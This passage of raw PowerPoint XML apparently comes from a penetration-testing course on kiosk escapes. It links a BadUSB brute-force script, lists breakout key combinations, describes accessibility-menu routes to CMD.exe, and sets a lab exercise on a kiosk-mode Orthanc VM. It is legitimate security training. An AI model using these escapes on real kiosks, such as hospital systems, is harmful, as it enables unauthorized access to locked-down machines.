            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ducky Scripting - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://docs.hak5.org/hak5-usb-rubber-ducky/duckyscript-tm-quick-reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183547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06ED-2AD4-6B85-2A35-5175438CAE90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving Inward – The Kiosk (Escape Tools)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA96DD4-8FF9-8070-102C-D1D2A7F47F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A person riding a bicycle&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1428C31-6936-1B23-DDAA-99E33BBB6135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4110184" y="1381741"/>
            <a:ext cx="3708400" cy="5037243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157585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06ED-2AD4-6B85-2A35-5175438CAE90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving Inward – The Kiosk (Escape Tools)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA96DD4-8FF9-8070-102C-D1D2A7F47F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main goal is to get the application to CRASH/FAULT/OR open a OS Context Menu we can escape from.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Script I have used - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/nocomp/Kiosk-evasion-BADUsb-Bruteforce/main/kiosk-evasion-payload.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I use this version for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FlipperZero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and a modified version for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. The modifications in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allow for the KEYBOARD mode to be set to a mode that allows for more than two keys to be pressed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Info here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://forums.hak5.org/topic/40574-trouble-with-key-combo/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1480650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06ED-2AD4-6B85-2A35-5175438CAE90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving Inward – The Kiosk (Escape Tools)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA96DD4-8FF9-8070-102C-D1D2A7F47F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main goal is to get the application to CRASH/FAULT/OR open a OS Context Menu we can escape from.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Script I have used - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/nocomp/Kiosk-evasion-BADUsb-Bruteforce/main/kiosk-evasion-payload.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I use this version for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FlipperZero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and a modified version for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. The modifications in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allow for the KEYBOARD mode to be set to a mode that allows for more than two keys to be pressed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Info here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://forums.hak5.org/topic/40574-trouble-with-key-combo/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170799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9D11-CDC7-75A6-9EBA-EDFC281747E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GOLDEN RULE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02BAF001-5E8B-A15D-2A25-9BE3C6843852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We are all here to learn. We are all here to grow skills. We are not here to fuck about with other people’s systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get caught attacking a system or user outside of the scope of the teachings and you will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>yeeted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> out of the class in an instant. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>K thanx bye!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381162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06ED-2AD4-6B85-2A35-5175438CAE90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving Inward – The Kiosk (Escape Tools)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA96DD4-8FF9-8070-102C-D1D2A7F47F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The script automates multiple keystrokes to attempt to break out of the running Kiosk. Examples of the commands run are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ALT+F4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ALT SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ALT TAB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CTRL+B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CTRL+P</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CTRL SHIFT ESC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sticky Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3170456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06ED-2AD4-6B85-2A35-5175438CAE90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving Inward – The Kiosk (Escape Tools)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA96DD4-8FF9-8070-102C-D1D2A7F47F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOTE: Sometimes protections are enabled. I have escaped from a kiosk by noticing ONE pixel in a corner changed. One. Pixel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is where the patience is key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I have even made up my own escapes that both the manufacturer and Microsoft were like… “Do you know something we don’t?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More Kiosk Escape Cheat Sheets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/hardware-physical-access/escaping-from-gui-applications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3554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3C3C-1459-08C4-0FCC-3FD04AE34393}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moving Inward – The Kiosk (Windows Accessibility Options)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF2F89D2-6240-88AE-02CA-8EA14E6F00A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Great to have, but I doubt many surgeons will be blind.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many great escapes here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://support.microsoft.com/en-gb/windows/windows-keyboard-shortcuts-for-accessibility-021bcb62-45c8-e4ef-1e4f-41b8c1fc87fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WAYS TO ESCAPE with Accessibility Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hit Narrator &gt; Go To Voice Settings &gt; Go To Control Panel &gt; Explorer &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CMD.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Magnifier &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Simliarly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> go to Settings &gt; Go To Control Panel &gt; Explorer &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CMD.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3808903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681F-2334-8A21-2420-A4CD7A743C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670420" y="784574"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EXERCISE – KIOSK PLAY TIME (Windows VM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F382F63-7365-F9AC-BD1C-77C223411C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grab the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Installer located here: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install - https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>orthanc.uclouvain.be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/downloads/windows-64/installers/OrthancInstaller-Win64-17.11.0.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once installed, install Firefox:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.mozilla.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-US/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/windows/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kiosk’d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> browser by running the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"C:\Program Files\Mozilla Firefox\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" http://localhost:8042/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>explorer.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --kiosk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This will launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in a Kiosk mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With the exception of things like CTRL+ALT+DELETE and ALT+F4, what other escapes can you find? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are there any ways you can find to hit the Desktop from this mode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most interesting Kiosk Escape to Desktop will get something.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2555144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B767-CB1B-F5A9-A959-AD7134F66E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking USB Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95A67653-4D2B-6DB5-7060-914D1D6E51FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two tools I use most often to accomplish this on tests, A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BashBunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and a USB with malware that will be detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
